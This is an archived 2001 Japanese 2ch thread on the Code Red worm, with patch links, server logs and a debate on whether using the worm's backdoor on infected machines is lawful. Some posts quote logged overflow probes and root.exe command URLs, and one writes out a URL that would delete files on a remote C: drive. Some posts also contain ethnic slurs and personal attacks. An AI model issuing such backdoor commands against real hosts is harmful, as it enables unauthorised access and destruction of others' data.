5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

コードレッドパート5 日本政府は反省汁

1 :CodeRed:2001/08/14(火) 19:04
.∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
( ´∀`)< お前らまだやってんのかよ   |
.       \____________/

優良スレはまだまだ続く  CodeRed スレ Part5.
ひょっとして 9/30 まで続くのか?
まもなく新しい亜種が登場する? 基本はマターリでお願いします。

〓〓〓 WindowsNT4.0/2000 ユーザーはチェックしよう 〓〓〓
1.インデックスサービスを停止しても感染予防になりません
2.ログオンして Ctrl-Alt-Del を押す
3.「プロセス」タブを選択する
4.Inetinfo.exe プロセスを探す
5.見つかった人で、ちゃんと対策済みと自信を持って言える人以外は
  すぐに↓をチェック!
 http://www.microsoft.com/japan/technet/security/codeptch.asp

前スレ↓
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742
さらに前↓
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996563662

2 :CodeRed:2001/08/14(火) 19:05
とりあえずここを読め!
Code Red (主にII) 関係のリンク

IPA:「Code Red ワームに関する情報」
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html

マイクロソフト:対処方法
http://www.microsoft.com/japan/technet/security/codealrt.asp

橋本 喜代太氏:Code Red II についての警告
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

オランダでの観測と、東アジア爆発の中心
http://www.security.nl/misc/codered-stats/
http://jove.prohosting.com/~wingtxt/source/nakasu121.jpg

首相官邸へ提言 トロイの木馬型ウィルス「CodeRed」対策を求める
http://www.interlink.or.jp/notification/backno/2001/info012.html

3 :名無しさん@お腹いっぱい。:2001/08/14(火) 19:05
 

4 :CodeRed=前スレ917:2001/08/14(火) 19:05
立てたよん。

おまけ
http://isweb24.infoseek.co.jp/computer/titikun/CRhuri.htm

5 :前スレ917:2001/08/14(火) 19:08
タイトル長すぎでエラーでたので、ちょっと修正しました。

6 :え〜ん:2001/08/14(火) 19:08
おー917さんおつかれ

7 :前スレ917:2001/08/14(火) 19:10
おれもかちゅ〜しゃなんだけど、ブラウザ立ち上げたよ(w

8 :名無しさん@お腹いっぱい。:2001/08/14(火) 19:11
ここは良い板だ

9 :では、お決まりの・・・:2001/08/14(火) 19:12
┌─────┐
│ ウィソNT ..  .│       ルーター
│  IIS   .┏┷┓EtherNet.┏━┓Internet
│(´д`)  ┃80┠────┨80┠─────(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓ . . ..┗┯┛     . ┗━┛
│  ISAPI  . .│
│  ↓  .  . │
│IndexServer│
└─────┘

┌─────┐
│ ウィソNT   .│       ルーター
│  IIS .  ┏┷┓ EtherNet ┏━┓Internet
│(´д`)  ┃80┠(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓   ┗┯┛      .. ┗━┛
│  ISAPI  . .│
│  ↓     ..│
│IndexServer│
└─────┘

┌────────┐
│ ウィソNT       │       ルーター
│  IIS       ┏┷┓ EtherNet ┏━┓Internet
│(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓      ...┗┯┛   ..    ┗━┛
│  ISAPI      . │
│BufferOverFlow!  .│
│               │
└────────┘

┌────────┐
│ ウィソNT      .  │       ルーター
│  IIS       ┏┷┓ EtherNet ┏━┓Internet
│(゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ
│  ↓    .   ┗┯┛   ..    ┗━┛
│   ISAPI.  .      │
│BufferOverFlow!.  │
│   .          │
└────────┘

10 :前スレ917:2001/08/14(火) 19:13
さて、メシでもクーテこよ。

11 :名無しさん@お腹いっぱい:2001/08/14(火) 19:24
ごくろーさんです。

12 :名無しさん@お腹いっぱい。:2001/08/14(火) 19:25
>>1=前917 お疲れ〜。

しかし、マジ終わらんねぇ。
今日になって減少傾向も止まってしまった。

13 :名無しさん@お腹いっぱい。:2001/08/14(火) 19:33
前スレの923さ〜ん。
結果報告してね(w

14 :名無しさん@お腹いっぱい。:2001/08/14(火) 19:47
>>12
それだけどさ、なぜちょと増えたがわかるひといる?

15 :え〜ん:2001/08/14(火) 19:58
管ですな というかうちは1日平均250〜300
飯食ってくる

ひさびさage

16 :名無し:2001/08/14(火) 20:08
全然状況 改善されておりません。211.*.*.* 9割糞チョン

17 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:11
まだまだすくねーよ、もっとがんばれよ赤虫。

18 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:19
うちのアパッチにこんなログあった。新種?

172.*.*.42 - - [14/Aug/2001:14:28:46 +0900] "GET /x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=x%20HTTP/1.1
HTTP/1.0" 404 276
172.*.*.42 - - [14/Aug/2001:14:53:19 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287

19 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:21
新種じゃないでしょ〜
GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
アタックされてます(w

20 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:23
>>19
でもアパッチだよ?

21 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:24
>>18 外からバックドアたたいてるんじゃん

22 :18:2001/08/14(火) 20:25
UNIX + apache だからIP知られることもないんだけどなぁ

23 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:28
こんどはバックドア叩いて回るワームが出たのか?

24 :18:2001/08/14(火) 20:28
この AAAA ってやつと /scripts/root.exe?/c+dir はセットで残るんだよ

25 :え〜ん:2001/08/14(火) 20:28
インターリンクがテストしてるんじゃないの。
あたりかまわずバックドア探し→コードレッドと変わらないって

26 :18:2001/08/14(火) 20:29
でも、x.ida?AA〜 だから、そんなファイルないでしょ?

いたずらなのかなぁ

27 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:30
>UNIX + apache だからIP知られることもないんだけどなぁ

近所の適当なアドレスに出してる

28 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:33
性質上、一匹見つけたら近所に一杯いる可能性が高いからね。

29 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:34
AAAA...は多分eEyeのチェッカー。

30 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:44
>>29
正解

31 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:46
今日ISSのセミナーに行ってきたよ。
ここで知ったことのおさらいって感じだった。
ところどころいいかげんだったけど。

セミナー後に亜種の話とかすこし聞いたけど、
OSが日本語版かどうかのチェックをしている亜種があるって言ってた。

ま、どこまでホントかわかんないけど。

32 : 名無しさん@お腹いっぱい。:2001/08/14(火) 20:59
>>28
ゴキブリと同じですな(w

33 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:59
8/15に日本のだけ起動不可にするなんてのだったらけっこう
すごい事になるね。

34 :え〜ん:2001/08/14(火) 21:04
ちょいゲフインだけどインターリンクねたうぷしたよ。

35 :名無しさん@お腹いっぱい。:2001/08/14(火) 21:08
下品以前に....

36 :え〜ん:2001/08/14(火) 21:12
>>35
絵はへたヨ
コードレッドバスターってこういうことじゃないの?
バックドアから無理やり入る

37 :名無しさん@お腹いっぱい。:2001/08/14(火) 21:24
裏口チェッカー
http://127.0.0.1/scripts/root.exe?/c+dir

既出?

38 :名無しさん@お腹いっぱい。:2001/08/14(火) 21:27
>>34
うほうほっ

39 :名無しさん@お腹いっぱい。:2001/08/14(火) 21:28
>>18
もしこれが新種だとすると
近所のIP総に対してスキャン&ノックの2連発を発射。
ノックに返事したIPを返信って感じか?

40 :38:2001/08/14(火) 21:29
あぁ、日本語ヘンダネ
総スキャンといいたかったアルネ

41 :39:2001/08/14(火) 21:30
更に39だったアルネ

42 :名無しさん@お腹いっぱい。:2001/08/14(火) 21:35
>>37
 思いっきり。でも、気にしなくていいよ。
 ただ、それで確認するのは勧められない。

43 :名無しさん@お腹いっぱい。:2001/08/14(火) 21:50
みんな祭りに行ったか(w

44 :え〜ん:2001/08/14(火) 22:32
祭りって珍走のことか?

45 :名無しさん@お腹いっぱい。:2001/08/14(火) 22:59
全然興味無いんだけど、CodeRedProveっての見つけたよ。
ttp://ueno.cool.ne.jp/zeiger/vernichten.html

CordRedからのアタックを検知して、
送られてきたデータをバイナリで記録する事も可能、

だってさ。

46 :名無しさん@お腹いっぱい。:2001/08/14(火) 23:30
GET /default.ida?XXXXXX...
を見に来たIPで、http://(そのIP)/ってブラウザ見に行くと、
IISでなくてPWSが立ってることあるんだけど、こういうものなのかな?

47 :名無しさん@お腹いっぱい。:2001/08/14(火) 23:43
HEADを送ってWWWサーバーが何か確かめよう。

48 :名無しさん@お腹いっぱい。:2001/08/14(火) 23:52
>>45
すまんが、前々スレで既出だ。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377&st=952&to=952&nofirst=true
しかし、proveって、普通probeなんだが、
なんか意味があるのか?
どちらかと言うと、同じく既出のCodeRedWatcher
というのの情報きぼんぬ。

49 :え〜ん:2001/08/15(水) 00:05
そろそろ寝る

オヤスミ

50 :名無しさん@お腹いっぱい。:2001/08/15(水) 00:05
さて、みなさんの所は未だ連日連夜相当数のアタックを受けているのでしょうか?
私のところは11日以降ぷっつりと途絶えました。

51 :名無しさん@お腹いっぱい。:2001/08/15(水) 00:12
14日は139回

52 :名無しさん@お腹いっぱい。:2001/08/15(水) 00:23
総数はかなり減ったけど、odn.ad.jpはむしろ増えてるところが恐ろしい

53 :名無しさん@お腹いっぱい。:2001/08/15(水) 00:26
チョソンからラブコールが続く・・・

54 :名無しさん@お腹いっぱい:2001/08/15(水) 00:28
お盆明けにまた増えるよ。sage

55 :名無しさん@お腹いっぱい:2001/08/15(水) 00:37
>>46
不可能ではないよ。
ポート80がIISでポート8080がapacheとかね。

56 :55:2001/08/15(水) 00:39
ん?違うかも?

57 :名無しさん@お腹いっぱい。:2001/08/15(水) 01:08
>>51
うちは173回です。
昨日あたりから減少が止まって若干増えてる
http://www.kondo.homeip.net/codered.html
盆だから評価しずらいけど、定常状態かなあ

58 :ちょっとマジめに:2001/08/15(水) 01:42
実際同じプロバの人間からcoderedアタック食らった時は
ISPにmail出したほうがいいのかな?

俺が管理者ならそんなメールウザイだけなんだが

59 :名無しさん@お腹いっぱい。:2001/08/15(水) 02:00
シスコーンな人向けだそうな
http://www.cisco.com/warp/public/63/nbar_acl_codered.shtml

60 :名無しさん@お腹いっぱい。:2001/08/15(水) 03:17
.jp からのアタックは減って来ている。

61 :名無しさん@お腹いっぱい。:2001/08/15(水) 03:18
前スレ890じゃないが、/.Jがコードレッドバスターで盛り上がってる。(w
妙に粘着なコメントも。恨みでもあるのか?(もしかして某社のユーザ?)

http//slashdot.jp/comments.pl?sid=01/08/14/0712213&op=&threshold=0&commentsort=0&mode=thread&startat=&pid=17#22

62 :名無しさん@お腹いっぱい。:2001/08/15(水) 04:13
くらあM$!お前らが直接マスコミでも何でも使ってお前らの客に不良品の注意を呼び掛けろ!
他人のせいにすんな迷惑M$!

63 :名無しさん@お腹いっぱい。:2001/08/15(水) 04:24
interlinkが泣いてます。
なにも総理大臣にチクらんでも・・・・
そんなに深刻なのか???

64 :名無しさん@お腹いっぱい。 :2001/08/15(水) 04:25
ttp://www.asahi-net.or.jp/~KI4S-NKMR/

65 :名無しさん@お腹いっぱい。:2001/08/15(水) 04:25
まぁM$だからね

66 :名無しさん@お腹いっぱい。:2001/08/15(水) 04:54
だからM$を使っちゃいかんとあれほど…

67 :名無しさん@お腹いっぱい。:2001/08/15(水) 05:08
M$は反省汁ー!

68 :名無しさん@お腹いっぱい。:2001/08/15(水) 05:53
M$は全世界の管理者に残業手当を支給しろ。

69 :M$社員:2001/08/15(水) 07:00
セキュリティってなんですか?

70 :名無しさん@お腹いっぱい。:2001/08/15(水) 07:13
マスコミはテレビ映えするWeb書き換えのみ報道。
マスコミは長期大規模IP被害のCodeRedよりもHTMLの文字列をより重要視。

71 :名無しさん@お腹いっぱい。:2001/08/15(水) 07:22
マスコミが素でわかってないなnてことないかな?重要度

72 :名無しさん@お腹いっぱい。:2001/08/15(水) 07:45
今だにWin2000はいいOSだとか言って今日も買う馬鹿がいるからな。
まあ馬鹿は他人から自分のPCに何されても構わないんだろ。
ただ周りにパケットをばらまくのだけは止めてもらいたい。

73 :WIZ:2001/08/15(水) 07:53
2000の次は どうなんだろう?

74 :名無しさん@お腹いっぱい。:2001/08/15(水) 07:54
>>73
メールハックされたとか騒いでる人ですか?

75 :WIZ:2001/08/15(水) 07:57
あれはもう解決しました 犯人は速攻で捕まるでしょう



まぁ いろいろあったけどさ よろしくね

76 :WIZ:2001/08/15(水) 07:58
この名前書いてるだけで 荒らしが追ってくるから


そのうち匿名になるかもしれないから そこんとこも よろしく

77 :WIZ:2001/08/15(水) 07:59
とにかく 穏便に話をしたいだけさ 

78 :名無しさん@お腹いっぱい。:2001/08/15(水) 08:34
>>75
SPAMでトラフィックを増大させ、バックドア仕掛けられて晒された人だ。
人間CodeRedの称号を授けます。

79 :名無しさん@お腹いっぱい。:2001/08/15(水) 08:34
>72
テメーは何使ってんだよ。
Beか?Macか?BSD?それともLinux?
ケッ どれも同じようなもんだな。

80 :WIZ@ややキレ:2001/08/15(水) 08:36
いっぺん死んどく? >>78

81 :名無しさん@お腹いっぱい。 :2001/08/15(水) 08:43
>>78
人間IISのほうが適切かと...

82 :WIZ:2001/08/15(水) 08:45
どうでもいいや おまえらは無視しよう

ほかの人に迷惑になるしな

83 :名無しさん@お腹いっぱい。:2001/08/15(水) 08:56
http://www.security.nl/misc/codered-stats/detailed-v2.html
企業のサーバーなど対処されて然るべき所は概ね対応が済んで、
ダイアルアップユーザーとか、感染してることすら気づいていない奴だけが
残ってるって感じでしょうか。

84 :名無しさん@お腹いっぱい。:2001/08/15(水) 09:00
WIZたん出張もどきは?(藁

85 :名無しさん@お腹いっぱい。:2001/08/15(水) 09:01
ぬけてると言うか
ふぬけと言うか、何かすけーだぜー
もしかしてwin2000使ってんじゃねーの(w
誰とは言わんがな(w

86 :名無しさん@お腹いっぱい。:2001/08/15(水) 09:08
これ電話番号とか設定してあるのかな?今見れなくなったけど。
どいつもふぬけだな(w
Directory of D:\LINUX\release

2001/02/15 18:30 <DIR> .
2001/02/15 18:30 <DIR> ..
2001/02/14 20:40 593 options.pppoe
2000/08/31 19:14 20,740 pppoed-2.0
2000/08/31 20:02 22,260 pppoed-2.2
2000/08/31 04:24 2,898 start-pppoe
2000/08/31 04:24 1,007 status-pppoe
2000/08/31 04:25 577 stop-pppoe
6 File(s) 48,075 bytes
2 Dir(s) 0 bytes free

87 :名無しさん@お腹いっぱい。:2001/08/15(水) 09:11
>>73 さん
その、「2000の次は どうなんだろう? 」って何のことですか?
このスレは CodeRed のスレですよ。2000ってなんのことかわかりませんが、
CodeRed には2000云々ってのは全く関係ないと思います。
IIS の問題ではないでしょうか。NT5だけではなくNT4でも問題ですし。

その「2000」とやらと、「CodeRed」がどう関係するのか、ご教示
いただけないでしょうか?

88 :名無しさん@お腹いっぱい。:2001/08/15(水) 09:15
>>87
WIZたんはチャットセクースとFFXで忙しいので煽ってはいけませんです。(藁

89 :WIZ:2001/08/15(水) 09:27


わ〜ん


おまえらみんな知り合いのハッカーに


晒してもらうんだから見テロよ〜

90 :名無しさん@お腹いっぱい。:2001/08/15(水) 09:39
http://www.comnetq.com/mise/gin1/koteng1/aratama.htm
他人のメールアドレス?

91 :名無しさん@お腹いっぱい。:2001/08/15(水) 09:46
誰か泣きながら階段下りていったゾ(w

>>90
わざわざ2CHでメアド入れるというのもくさいよな

92 :名無しさん@お腹いっぱい。:2001/08/15(水) 09:52
>>79
>テメーは何使ってんだよ。

管理者がそう簡単に自社の使用OS言う訳ないだろ。
なんかこいつ、ここでBeとか言うあたり部外者のOSヲタクだろうな。
最近仕事にもならんクソスレが増えたよ。

93 :え〜ん:2001/08/15(水) 09:55
みんなおはよ

94 :名無しさん@お腹いっぱい。:2001/08/15(水) 09:58
あ、えーんさんだ。

95 :え〜ん:2001/08/15(水) 10:11
今日の1パツメうぷしたよ

もうねたぎれ  だれかいい画あったらおしえておくれ

96 :名無しさん@お腹いっぱい。:2001/08/15(水) 10:28
会社の方針でWin2000をサーバにしていた所は死んでください。

97 :名無しさん@お腹いっぱい。:2001/08/15(水) 10:33
某プロバイダから攻撃が来てて、警告のメールを出したら一時は
おさまってたんだけど、今度はどうやらそこの DNS に感染した
模様……しっかりそこから攻撃が。こんな会社があるからこんな
ことになるんだよなぁ……ぶつぶつ。

98 :名無しさん@お腹いっぱい。:2001/08/15(水) 10:44
>>72はWin2000を買ったんだね。

99 : :2001/08/15(水) 10:49
レポート元 [Animefantasia] p2p.animeshare.com:8875
Wednesday, August 15, 2001 10:36:44

ユーザ名 : font12345
アクセスレベル : User
オンライン時間 : 7:27:29
入室チャンネル :
状態 : Active
共有ファイル数 : 55
現在のダウンロード : 0
現在のアップロード: 1
接続種類 : DSL
クライアントバージョン : WinMX v2.6j

最悪の持ち逃げヤロウ。

100 :ヲチ住人:2001/08/15(水) 11:00
こちらで、ヲチのWIZスレに苦情を書き込まれた方はいらっしゃいますか?

101 :名無しさん@お腹いっぱい。:2001/08/15(水) 11:05
>>73
他所の板にまで迷惑をかけるな。
まず、ネットウォッチ板に帰ってきて、
君の流した”電波スパム”について、全面的に謝罪しようか。
話はそれからだ。

102 :名無しさん@お腹いっぱい。:2001/08/15(水) 11:09
おはよ〜。なんかちと荒れてるね。

>>46 亀レスすまん
Win98 で PWS つかってて、Win2K にアップグレートとかすると、
そういう状態 (サーバーは IIS, コンテンツは維持) になるみたいよ。

103 :ヲチ住人:2001/08/15(水) 11:19
>>102
申し訳ありません。
うちのスレのふとどき者がWIZを騙って暴れているんです。
(本人確認済み)
そのものは近いうちになんとかしますので、無視をお願いします。

104 :え〜ん:2001/08/15(水) 11:24
>>103
気にせんでいいよ
泣きながら帰ったみたいだから >>91

105 :名無しさん@お腹いっぱい。:2001/08/15(水) 11:35
http://www.microsoft.com/japan/technet/security/redfix.asp
Code Red II ワームの既知の影響を排除するツール

106 :名無しさん@お腹いっぱい。:2001/08/15(水) 11:59
Kaspersky って人が www.viruslist.com で記事書きつつ
CodeRed 駆除? ツールをあげてますね。
http://www.viruslist.com/eng/default.asp

「Don't Cut Off Your Nose to Spite Your Face」って記事。
なかなかアレげでよい
がいしゅつ?

107 :106:2001/08/15(水) 12:04
unzip ると 「Kaspersky Anti-Virus Internet Server Extension」
という機能をIISにアドオンする DLL が出て来ます。
ソースも公開してるみたい。
やばそな GET ブロックしたりログ取ったりするようですな。

108 :名無しさん@お腹いっぱい。:2001/08/15(水) 13:39
>>105-107
素敵

109 :名無しさん@お腹いっぱい。:2001/08/15(水) 14:03
exploitによるサーバ侵入でも、不正アクセス禁止法で挙げられるみたいだけど。
CodeRedを侵入させた場合も黒だよね。被害届出したらどうなる?

また、MSが例によってバッファオーバーフローを「仕様だ」とした場合。
exploitによる外部からの機能変更も「仕様にある機能を利用した」だけ
って事にはならないのかな。

110 :名無し:2001/08/15(水) 14:17
アタック元のIPのWWW見に行ったらCodeRedじゃなくて
SunOS/BoxPoison.wormだった。
ウイルスチェッカ更新しといてよかったよ。
まあ自分はWinだからどっちみち問題ないだろうが・・・
ちなみにHPにはこんなメッセージが表示されていた。
fuck CHINA Government
fuck PoizonBOx

111 :なー:2001/08/15(水) 14:18
不正アクセス行為の禁止等に関する法律
http://law.e-gov.go.jp/htmldata/H11/H11HO128.html

112 :名無しさん@お腹いっぱい。:2001/08/15(水) 14:30
ぐがっ停電で3台とも落ちたよ・・・
とりあえずカミナリが赤虫よりコワ。オフトピすまぬ。

113 :名無しさん@お腹いっぱい。:2001/08/15(水) 14:31
>>109
> また、MSが例によってバッファオーバーフローを「仕様だ」とした場合。
「例によって」って、過去にそんな例あったっけ?
煽りじゃなくてマジ質問。

114 :なー:2001/08/15(水) 14:33
不正アクセス禁止法の3条の3にこうある。
> 三  電気通信回線を介して接続された他の特定電子計算機が有するアクセス制御機能によりその特定利用を制限されている特定電子計算機に電気通信回線を
>通じてその制限を免れることができる情報又は指令を入力して当該特定電子計算機を作動させ、その制限されている特定利用をし得る状態にさせる行為

単純に解釈すると「/script/root.exe?/c〜」はこの「制限を免れることができる情報」って事。
少なくともアクセスに際してIDやPASSWDが有ろうが無かろうが鯖管理者の承諾が無いコードで制御を得ると
「不正アクセス」と解されるかもよ?

115 :名無しさん@お腹いっぱい。:2001/08/15(水) 14:35
不正アクセスになるだろうけど、被害届を出しても
>管理者は、‥‥‥‥不正アクセス行為から防御するため必要な措置を講ずるよう
>努めるものとする。
管理が悪いと言われて終わりかも。(藁)

116 :名無しさん@お腹いっぱい。:2001/08/15(水) 14:38
>>109
CodeRedを送出して侵入させた鯖の管理者に責任を問えるかなあ?
ウイルスの被害者が加害者にもなる場合やら踏み台にされた鯖の管理者の責任って
明示されてないんじゃない?

117 :名無しさん@お腹いっぱい。:2001/08/15(水) 14:39
漏れの頭もバッファオーバーフロー

え〜ん氏またなにやらUPしてるし・・・

118 :名無しさん@お腹いっぱい。:2001/08/15(水) 14:40
>>110
やだねー。踏ミ台にされてるマシンがとっても沢山ありそうだ
個人的にはこれに乗じて仕込まれる(であろう)その種のモノの
2次被害がむしろ心配。
ヤられたIIS鯖のみなさーん、潔くHDD洗ってね。(藁

119 :114:2001/08/15(水) 14:41
違った。3条2項3号だった。

120 :118:2001/08/15(水) 14:42
漏れ勘違いしたな?

121 :名無しさん@お腹いっぱい。:2001/08/15(水) 14:42
>>116
まさにそこが問題。
ではあるのだが、意図的にバックドアから侵入した場合の
ほうが悪意があると判断されて不利になりそう。
今回だれか裁判して判例を作ってくれ(w

122 :109:2001/08/15(水) 14:45
>>113
いや、バグを仕様とする事を「例によって」と書いてしまった。
ちょっと書き方悪かったスマソ。

>>114
root.exeに触れたら即アウトかと。
CodeRedが自動的に行う「その制限されている特定利用をし得る状態にさせる行為 」って
やつの責任はCodeRed感染サーバーに掛かるのかしらん。

>>115-116
管理者の責任は明示されてるような気が(第五条)、でも罰則は無いね。

123 :名無しさん@お腹いっぱい。:2001/08/15(水) 14:45
>>115
そやね。
しかし、管理義務を怠っている鯖に侵入しても良い訳ではない。

124 :名無しさん@お腹いっぱい。:2001/08/15(水) 14:47
少なくともバックドアで侵入すると「圧倒的に不利」である事は自明。

125 :名無しさん@お腹いっぱい。:2001/08/15(水) 14:50
>>122
感染させた鯖も管理を怠っていた。
そこから送出されたCodeRedに感染した鯖も管理を怠っていた。
「管理を怠った管理者」が「管理を怠った管理者」に文句言う資格はある?

126 :名無しさん@お腹いっぱい。:2001/08/15(水) 15:08
バッファオーバーフロー起こさせようとしたけども相手がApacheだったから
クラックできなかったとかいう場合は罪に問えないのか。

127 :なんにせよ:2001/08/15(水) 15:18
検挙、逮捕、という恥ずかしい結果になろうとも、
実際弁護士、検察、裁判官、わかってんの? 判例というが、
法曹の場でこれほどややこしくなるとサイバー界専用のが居るなぁ。
各方面からの証拠書類あれこれと、膨大な実際裏方作業で報われる結果に
なるのだろうか?

>>126
玄関の鍵穴に違うの差し込んで、ガチャガチャやった感じかな。
実生活で言うと不法侵入未遂ってことか。補導の対象だな。。W

128 :名無しさん@お腹いっぱい。:2001/08/15(水) 16:21
アタックされて煩いわ、復讐しようとすれば犯罪者だわ、面白くないね。
馬鹿なNTユーザーが処罰されない法律そのものに問題があると思われ。
現実にスループット低下という状況がある以上、我々は被害者だ。

129 :名無しさん@お腹いっぱい。:2001/08/15(水) 16:52
執拗なアタックにより現実にこちらが被害を受け、
しかも連絡の手段も無い相手には、
最低必要限な調査としてのroot.exeへのアクセスは、
正当な防衛と主張できると思われ。

例えば、相手が単に無意識の感染によるものなのか、
それに偽装した意図的な攻撃で、今後被害が拡大し
そうなのかどうかなどは、座して待っているだけで
はわからない。

130 :名無しさん@お腹いっぱい。:2001/08/15(水) 17:14
>>129
それは感情論だけで、法的な根拠は何もないぞ。

131 :名無しさん@お腹いっぱい。:2001/08/15(水) 17:25
訪問販売のおばちゃんとか新聞の勧誘員がうざいからって、
殴ったら障害罪だろうねえ。

132 :名無しさん@お腹いっぱい。:2001/08/15(水) 17:30
新しい動きが無いから、同じ話題が繰り返されて、うざったいけど。
code redスレッドらしいといえばらしいかな。

>>129氏とかの有志が警察に宣言した上でバックドアからのIIS停止工作
をやったら見物人としては楽しいからやってみて欲しい。
やるなら正々堂々とね。

133 :なんにせよ:2001/08/15(水) 17:50
不毛な論議だな、誰だCodeREDの肩もつやつは?感染者と思われてもしかたないぞ。法的根拠なぞ両方にない。
前例でしか考えられないのもアポーン。
怒られた時点で、義務教育で教えて貰ってないもん。これで決定。
イカンならイカんとせっせと広報しない司法が悪い。
おれは、リンク踏んだだけと言えば場合により結構かも。
(飛び先辿られなければね)
どうでも言えるし、裁判官にすれば"ややこしうて爺にはわかりませんわ"ってのが本音だろうな。

134 :名無しさん@お腹いっぱい。:2001/08/15(水) 17:57
>>133
ステキ。マジ惚れた。

EVERYDAY PEOPLEさん復活age
http://people.site.ne.jp/

135 :なんにせよ:2001/08/15(水) 18:39
>>134
サンクス!

をを!EVERYDAY PEOPLE! この書き入れ時になにやっとったん!
夏休みもご苦労様。正常だったら対応出来なかったと見るが W
さぁ〜みなさん始まりです〜〜〜えぶりで〜〜ぴぃぽ〜。、、、

136 :129:2001/08/15(水) 18:46
まあまあ、マターリと。

正当防衛あるいは緊急避難については、例えば、以下のよ
うなものを参照すると、それほど法的根拠が無いとも言え
ないと思う。
>>130

http://inet.trendmicro.co.jp/contents/solution/industry/natsui990730.htm
正当防衛・緊急非難(明治大学 法学部教授・弁護士 夏井 高人 氏)
正当な理由がないのにメールの中身を読んだ場合には、人格権侵害な
ど損害賠償責任を負うことになります。しかし、それを放置すること
でシステムの安全確保ができないというような場合には緊急的措置と
してメールの内容を読んでしまうこともあり得るでしょうし、法律的
にもぎりぎり許されると思われます。

んでもって、>>132
> 警察に宣言した上でバックドアからのIIS停止工作

「最低必要限の調査」と>>129でも書いたと思う。よって
やるのなら他の人やってほしい。

いぢょ。

137 :名無しさん@お腹いっぱい。:2001/08/15(水) 19:23
短期的な論点として、
「メールでの警告が不能な時、root.exeを用いた警告は是か非か?」でどお?

138 :名無しさん@お腹いっぱい。:2001/08/15(水) 19:25
なるほど・・・
例えるなら、震災時の倒壊しそうな危険な建物を故意に潰して安全を確保するようなものか

139 :名無しさん@お腹いっぱい。:2001/08/15(水) 19:27
非。
どうも感情的に「オレはウイルスを送りつけられた被害者だ!」と
主張する向きが多い気がする。
帯域を圧迫されるほど大量に送られてるヤツって多いの?

140 :名無しさん@お腹いっぱい。:2001/08/15(水) 19:29
>>138
現状は震災ほど深刻か?
震度3程度で踏み込まれては堪らんよ。

141 :名無しさん@お腹いっぱい。:2001/08/15(水) 19:36
root.exeと言わないでバックドアと言った方が...
言葉の違いだけなんだけど印象違うね。
root.exeを触っただけでアウトの可能性は高い。
ディレクトリ掘るのは器物破損になるのかな(笑)
net sendするのは...

142 :名無しさん@お腹いっぱい。:2001/08/15(水) 19:42
「バックドアを使う」の定義をCodeRedに当てはめるのと どこからどこまでの行為かが曖昧になる。
「root.exe(cmd.exe含)を使う」の方が明確だよ。

143 :名無しさん@お腹いっぱい。:2001/08/15(水) 19:53
>>141
電子計算機損壊等業務妨害って罪になるのかな

144 :名無しさん@お腹いっぱい。:2001/08/15(水) 19:56
root.exeを使うの方が罪悪感なくていいよ。

145 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:00
確かに「ただのurlじゃん。port80を開放してる方が悪い」とする意見は聞こえてきそうだ。

146 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:02
>>144
メッ!

147 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:05
刑法 第二百三十四条の二
(電子計算機損壊等業務妨害)
人の業務に使用する電子計算機若しくはその用に供する電磁的記録を損壊し、
若しくは人の業務に使用する電子計算機に虚偽の情報若しくは不正な指令を与え、
又はその他の方法により、電子計算機に使用目的に沿うべき動作をさせず、
又は使用目的に反する動作をさせて、人の業務を妨害した者は、五年以下の懲役
又は百万円以下の罰金に処する。
http://law.e-gov.go.jp/htmldata/M40/M40HO045.html

148 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:08
刑法 第三十七条
(緊急避難)
 自己又は他人の生命、身体、自由又は財産に対する現在の
危難を避けるため、やむを得ずにした行為は、これによっ
て生じた害が避けようとした害の程度を超えなかった場合
に限り、罰しない。ただし、その程度を超えた行為は、情
状により、その刑を減軽し、又は免除することができる。
 前項の規定は、業務上特別の義務ある者には、適用しない。

149 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:12
>>148
死ぬ程の事か?(藁

150 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:15
たとえばなんの説明無しに
http://*.*.*.*/scripts/root.exe?/c+dir+"c:\"
http://*.*.*.*/scripts/root.exe?/c+del*****+"c:\"
ってかきこをどこぞの厨房がクリックして消えた場合
どうなるんだ?

151 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:15
海外のサーバーに対してやる場合は何処の管轄なの?インターポール?

152 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:16
